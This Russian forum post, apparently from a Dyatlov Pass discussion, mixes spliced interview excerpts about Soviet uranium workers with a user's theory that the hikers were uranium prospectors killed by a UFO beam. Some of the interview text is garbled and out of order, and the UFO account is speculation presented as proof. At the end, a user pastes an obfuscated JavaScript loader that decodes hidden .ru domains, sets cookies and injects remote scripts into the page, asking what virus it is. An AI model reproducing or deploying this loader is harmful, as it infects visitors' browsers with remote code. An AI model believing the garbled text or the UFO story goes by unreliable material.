Директор комбината Дмитрий Петрович Бобрицкий пустил пулю в висок, не выдержав хамовитости «верхов» и склок местных чинуш. Георгий Семенович Куценко, главный инженер Степного уранового объединения не принял перестройку. Вскрыл вены. Полоснул ножом по своей судьбе. 
[свернуть]
Спойлер
Константин Александрович Метцгер, начальник геологических партий, авторитетнейший и самостоятельнейший человек. Дважды представлялся к званию Героя, но из-за анкетных данных так и не получивший достойного признания. Накинул Костя петлю на шею. 
[свернуть]
Спойлер
Сережа Соколов, бывший начальник шахты, великолепный горняк. Неоднократно «на отлично» выполнявший правительственные задания. Но когда его представили к ордену – вычеркнули из списка. Эту низость никогда не понять. Он выбросился с балкона своей квартиры в Краснокаменске... 
[свернуть]
Спойлер
Были и другие талантливые, яркие руководители, которые ушли подобным путем. Причины те же самые – нечеловеческие отношения. Но даже многие из тех, кому ставили диагноз «инфаркт сердца», на самом деле погибали от инфаркта души. Мы сами порой не замечали в бешеной скачке к урану потери своих друзей. 
[свернуть]
Спойлер
— В этой «бешеной скачке к урану» вы непосредственно соприкасались с радиоактивностью... 
[свернуть]
Спойлер
— Вы прямо спрашивайте: знали ли ребята, что они облучаются и принимают большие дозы? Я в печати даже встречал, мол, ничего они не знали. Их правительствоую задачу. Мне самому приходилось находиться в условиях, когда излучение составляло 500 тысяч норм. И я это знал. 
[свернуть]
Спойлер
Лев Николаевич Лобанов, главный геофизик уранового комбината, бледнея от негодования, мог выскочить из машины и поднять, выпавший из самосвала кусок огромной процентной урановой руды. И, положив его в багажник, отвезти на специальную площадку. 
[свернуть]
Спойлер
В своей записной книжке он отмечал полученные им дозы облучения за весь период его деятельности в Польше, Румынии, Средней Азии и на Приаргунском комбинате. Я смеялся и спрашивал: 
[свернуть]
Спойлер
— Лева, а когда кончина твоя просматривается? 
[свернуть]
Спойлер
Он однажды открыл свою книжку и ответил: 
[свернуть]
Спойлер
— В пятьдесят лет! 
[свернуть]
Спойлер
В этот роковой срок он потом и умер. Сейчас его могила самая ухоженная в центральной части Краснокаменского кладбища. 
[свернуть]
Спойлер
Поступая очень дальновидно, потому что весь мир стоит на пороге энергетического кризиса. 
[свернуть]
Спойлер
— Мы вывозим сейчас из России больше урана, чем добываем. Хотя известно, что кроме Стрельцовского рудного поля, на территории страны других крупных рентабельных месторождений урана практически нет. Причем самое ценное мы с него уже взяли. А то, что добываем, покрывает наши нынешние потребности лишь процентов на двадцать. То есть сейчас мы используем и вовсю распродаем наработанный уран, который получили в прежние полвека. А американцы его во всю скупают. Поступая очень дальновидно, потому что весь мир стоит на пороге энергетического кризиса. У нас есть государственная программа о дополнительной добыче урана. Но... Недавно мне позвонил из ВСЕГЕИ, замечательный геолог Сергей Владимирович Бузовкин, и я ему такой же вопрос задал, как и вы мне. В ответ услышал: «Если сказать, что плохо, то это будет слишком оптимистично» 
[свернуть]
Спойлер
— Со ссылкой на вас мне рассказали удивительную историю о том, какой неожиданный поворот мог произойти в судьбе Байкала... 
[свернуть]
Спойлер
— В районе знаменитого озера есть радиоактивные аномалии. Я сам их проверял на Ольхоне. Но только вредности для человека они никакой не представляют. Маленькая концентрация.
[свернуть]
Спойлер
 обманывало, и они были в полном неведении. Неправда! Знали. Знали, и сколько норма, и сколько рентген на самом деле мы хватали. Мы же непосредственно работали с ураном и были специалистами в этом деле. Но кому-то надо было это делать. Работали часто в жутких условиях. Поначалу без вентиляции. Прекрасно понимая, на что идем. Просто был настоящий энтузиазм в работе и огромное желание выполнить поставленн
[свернуть]
[свернуть]

То что их убили сомнений нет. 

Это В.О. мне всегда казался странным.. 

На Отортене не были а (хвастают). 
Это фраза (туристорождаемость пошлая ) а ведь именно покорение Отортена хотели посветить сьезду а тут ... 

Явно им было не до (помпезности) в дневниках молчок и только В.О. приклеен намертво к стенке палатки.. 

Напряжённость на фото установки палатки и пустой блокнот в руках мёртвого С.З. как намёк ищите мы Вам написали..

http://polyarny.net/letopis/rabota-cup/

Спойлер

В 1960 г. массовыми поисками при геологической съемке масштаба 1 : 50000 партией Ю.Ю.Эрвье на Полярном Урале рядом с Харбейским молибденитовым месторождением было выявлено Ново-Харбейское рудопроявление урана с богатыми гнездовыми рудами, что послужило одним из оснований к развертыванию в 1961-1965 гг. поисковых работ на Полярном, Приполярном и Северном Урале. Рудопроявление урана было открыто в ходе первого рекогносцировочного геологического маршрута. Первая точка с повышенной активностью до 56 мкР/час на фоне 5 – 10 мкР/час была зафиксирована студентом Кузьменко Е.И. и техником-геофизиком Пономаревой И.М. на восточном склоне горы.

При более детальном исследовании на данном участке была обнаружена глыба катаклазированных диоритов, на обохренной хлоритизированной поверхности которой активность достигала 612 мкр/час. Радиоактивность была обусловлена тонким налетом радиоактивного минерала на поверхности. Позднее, старшим техником геофизиком Кулаковым В.В. при поисковых маршрутах на южном склоне горы был обнаружен коренной выход темно-серых хлоритизированных пород со смолковой минерализацией мощностью 0,7 м, залегающий среди бластомилонитов и имеющий активность свыше 7500 мкр./час.

Территория деятельности организованной специализированной экспедиции охватила восточную окраину Русской платформы, Предуралье, Урал и Мугоджары, Зауралье, Западно-Сибирскую низменность – огромное пространство от Казахстана на юге до Карского моря на севере. Административно в эту территорию входили Башкортостан и Республика Коми, Свердловская, Пермская, Челябинская, Курганская, Тюменская и Оренбургская области РФ. Кроме того, продолжительный период значительный объем работ проводился в пределах Актюбинской и Кустанайской областей Казахстана, Удмуртской и Татарской Республик, Самарской области России.

Комплекс поисковых работ, выполненных в 1955-1958 гг. на Южном Урале привел к открытию в Челябинской области первых рудных залежей Санарского месторождения урана в молодых песчано-галечных отложениях. Результаты дальнейших поисков и разведки, продолжавшихся по 1964 г., привели к выводу об обнаружении первого промышленного месторождения урана нового, до селе неизвестного в Союзе, уральского типа. Эти находки впоследствии отвлекли внимание уральских геологов-уранщиков от Урала Полярного.

В результате исследований установлено наличие высоких перспектив выявления в Уральском регионе, в том числе на Полярном Урале богатых урановых руд, связанных с зонами региональных структурно-стратиграфических несогласий.

[свернуть]

Д Н

Встретим XXI сьезд увеличением урановых месторождений!

Предисловие:

Уважаемый читатель т.к. Игорь Дятлов по своим увлечениям  близок мне -напишу как я это вижу.
Постараюсь привести доказательства ,какие есть с моей точки зрения.
Вам нужно понимать что делаю я это исключительно  для раскрытия тайны П.Д.

Постараюсь коротко..(более подробно с расшифровкой позже)

1). Готовится поход 3 (наивысшей)категории сложности.Отбор идёт только проверенных и надёжных(как космонавтов).
И вдруг насильно дают (тёмную лошадку С.Золотарёва) разговор короткий или с ним или запрет похода.
Доказательства: 
http://taina.li/forum/index.php?msg=1379
Дневник Людмилы Дубининой
Этого Золотарева никто не хотел сначала брать, ибо человек он новый, но потом плюнули и взяли, ибо отказать - не откажешь.
2).Негласно группа И.Дятлова будет везти разведку новых урановых месторождений.Взамен получили выкопировку карты (военной).
Доказательства:
Например.
Из воспоминаний Брусницына: "Вот когда мы на Саяны ходили 57 год. Мы с геологами связывались там, с местными. 
–Давайте нам что-нибудь. Мы работу за вас проведем. Мы же в глухие места, где никого нет. Там за сотни километров ничего нет. Может вас что-то там интересует? 
- Да, интересует. Вот вам счетчик – и смотрите где радиация, зафиксируйте на карте и нам передайте." 
http://sibirica.su/glava-pervaya/uranoviy-chelovek
Урановый человек-Это раньше нельзя было произносить даже вслух само слово.-
Чтобы был понятен существовавший ранее уровень секретности, приведу такой факт. Ленинскую премию нам вручали на закрытом заседании в Кремле. В президиуме было больше народу, чем в зале. Кроме нас, эту высокую награду получали также технологи атомщики и конструкторы космических кораблей. Вызывали к трибуне только по имени отчеству. Фамилий вообще не называли. Примечательно, что в дипломе лауреата нет ни единого слова об уране.

3)Экипировка Г.Д. -фотоаппараты,фото-штатив,большое кол.плёнок,биноколь,фото-экспонометр(совершенно ненужная вещь,если не снимать в сумерках)..
Т.е. предполагались сьёмки в темное время суток со штатива и выдержкой В(от руки)
Назовем это пошли в поход за (огненными шарами).
Доказательства:
Интерес И.Дятлова к рассказам об огненых шарах об этом рассказывал ему местный летчик Геннадий Патрушев.

Теперь основное:

4).Настил (партизанская лежка) ,окно на кедре в прямой видимости на Х.Ч.
Были сделаны не спеша раньше днем для наблюдения за склоном и фотографирования О.Ш.
Именно С.Золотарёв с фотоаппаратом и записной книжкой и химический карандашом был в момент трагедии внизу и видел всё.Он тут же разжёг костёр и Г.Д.целенаправленно пошла к нему ориентируясь на костёр.
Доказательства:
Разутая и раздетая группа без топора в шоковом состоянии не способна ночью сделать настил.
Ветки для настила срублены топором и основательно без спешки уложены в овраге.
Отпечатки 8 пар (столбиков)найдены на склоне и полностью одетый был именно С.Золотарёв.

5).Зачем надо было ставить палатку на склоне Х.Ч. Палатка служила местом наблюдения и фотографирования О.Ш.
Доказательства:
Ф.А. прикрученный к фото-штативу брошенный в палатке,34 кадр О.Ш.,фонарик включённый и  положенный на скат палатки направленный на кедр.
Выключатель китайского фонарика имеет дефект при сильном морозе и в метель -вода от снега замерзает в ползунке и теряется электрический контакт.Поисковики нашли фонарик во ВКЛЮЧЁННОМ состоянии (но не горящим) .
Когда они перещёлкнули выключатель несколько раз к их удивлению он  загорелся.

6).Зачем надо было резать на несколько частей лыжную палку.
(И.Дятлов для наблюдения за первым искусственным спутником запущенным в СССР собрал самодельный телескоп.)
Поэтому знал  мало сфотографировать обьект нужно его ещё (привязать) к местности т.е.
на фоне (голых) склонов невозможно определить ни приблизительный размер обьекта ни его скорость перемещения и дальность и т.д.
Но если поставить реперные метки(разрезанные части лыжной палки) на известных расстояниях от обьектива Ф.А. то можно будет примерно вычислить .
Как мы знаем они не успели этого сделать...

7).Кто выгнал их раздетыми из палатки.
Не чувствуя опасности они сели ужинать и вдруг совсем рядом зависло (нечто)..
Ударил мощный конусообразный луч (наградив) Г.Д. (загаром),радиацией,невыносимым до тошноты и неуправляемым чувством животного страха.
Г.Д.режут палатку и вспотевшие,по мокрому снегу идут вниз к С.Золотарёву.
Доказательства:
Рядом с палаткой оплавленный снег имеющий форму круга.
Заставить панически покинуть палатку здоровых,физически крепких парней и бросить всё не оказывая сопротивления могло только НЛО.
Я видел подобный обьект рядом,видел луч,знаю его силу и этот ужас.
Но обычно (обьект) он не преследует а только как бы прогоняет ..

8)  .Пока они все живы ,испуганны,ошеломлены но живы..
Придя в себя у кедра часть 3 решила поднятся к палатке и взять тёплые вещи,благо фонарик ещё светил на скате палатки.
Это было их ошибкой..
З.К.проползла ближе всех к палатке и перед смертью показала (фиг) обьекту..
Умирая она чувствовала себя Зоей Космодемьянской отсюда и этот жест..
Потом и остальные 2 были убиты. 
Доказательства:
Дело в том что (обьект)возвращение (приближение)к себе воспринимает как нападение и убивает..
Посмотрите на руки на посмертном фото З.К. сами увидите.

9).Смерть 2 из последней 4 в овраге наступила от мощного удара об снег лучом обьекта т.к.он луч поднимает людей и с силой швыряет об снег(землю).

Стащили трупы  в ручей уже  шаманы-манси (обьект)такими мелочами не занимается..
Подчёркиваю не простые манси а именно посвящённые шаманы-манси.
Именно по их наводке и нашли четвёрку в ручье под 4 метровым слоем снега.

P/S.
Участие КГБ СССР было обоснованно проверкой О.Ш.на предмет шпионажа из США.
В результате КГБ ничего не поняли и засекретили это дело..

Машинный код внизу не удаляется-что за х.. вирус?

window.a1336404323 = 1;!function(){var e=JSON.parse('["38376a6f6f6a696e3366622e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="21670",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e
  • ,16));return t},d=function(){return "novosti-kosmonavtiki.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.on error=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();